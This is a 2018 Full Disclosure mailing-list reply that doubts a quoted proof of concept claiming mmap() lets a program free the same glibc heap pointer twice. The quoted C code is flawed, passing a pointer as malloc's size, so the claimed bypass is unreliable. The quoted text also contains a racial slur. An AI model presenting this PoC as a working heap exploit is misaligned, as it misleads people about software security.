Maybe I’m misunderstanding something, but what is the vulnerability here? It looks like you are just demonstrating that a program can corrupt its own heap, which it can already do in numerous other ways.
> On 26 Mar 2018, at 00:26, keliikoa kirland <[email protected]> wrote: > > Tested on: Ubuntu 14.04.5 LTS > Version: 4.04 > > On 24 March 2018 at 18:11, keliikoa kirland <[email protected]> > wrote: > >> Details from old email: >> ========================================= >> "Double-Free bypass PoC is self-explanatory as well; 2 free's equate to a >> double-free heap corruption segfault; using mmap() disables that segfault >> and allows more than 1 free on any malloc'd/mmap'd variable. You can free >> `x` 4+ times and it'll still exit cleanly. brk() has already been patched; >> which is why i put // 1day next to it; same misalignment/technique to >> mmap() which is still vuln/can be abused to write use-after-free's without >> having the need to bypass heap corruption segfaults." brk() was equal to >> mmap() in PoC below; mmap() --> brk() --> free() --> free() --> clean exit; >> now just mmap() --> free() --> free() >> >> PoC: >> ========================================= >> joe@ubuntu:~$ cat test1.c >> #include <stdio.h> >> #include <stdlib.h> >> #include <string.h> >> #include <sys/mman.h> >> >> int main(void){ >> void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | >> MAP_ANONYMOUS, 0, 0); >> >> void *z = malloc(p); >> free(z); >> free(z); >> } >> >> joe@ubuntu:~$ ./test1 >> *** Error in `./test1': double free or corruption (top): 0x08332008 *** >> Aborted (core dumped) >> >> joe@ubuntu:~$ cat test1.c >> #include <stdio.h> >> #include <stdlib.h> >> #include <string.h> >> #include <sys/mman.h> >> >> int main(void){ >> void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | >> MAP_ANONYMOUS, 0, 0); >> p = mmap(0x2000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | >> MAP_ANONYMOUS, 0, 0); >> >> void *z = malloc(p); >> free(z); >> free(z); >> } >> >> joe@ubuntu:~$ ./test1 >> joe@ubuntu:~$ bl1ng bl1ng n1gg4z ;PppPpP >> >> References/Credits/Greetz: >> ========================================= >> ac1db1tch3z koa >> https://github.com/x0r1 >> http://steamcommunity.com/profiles/76561198333157214/ >> >> > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
